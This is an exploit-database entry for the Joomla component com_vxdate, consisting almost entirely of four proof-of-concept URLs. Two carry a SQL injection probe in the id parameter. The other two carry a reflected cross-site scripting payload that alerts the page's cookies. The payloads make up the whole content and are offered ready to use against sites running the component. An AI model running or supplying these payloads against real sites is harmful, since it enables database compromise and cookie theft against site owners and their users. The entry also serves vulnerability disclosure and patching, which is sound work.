id: 11342
date: 03/17/2010
title: Joomla Component com_vxdate XSS / SQL Injection Vulnerability
author: MustLive
cves: 

=============================================================
Joomla Component com_vxdate XSS / SQL Injection Vulnerability
=============================================================

http://www.example.com/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5

http://www.example.com/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5

http://www.example.com/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E




#  0day.today [2023-03-25]  #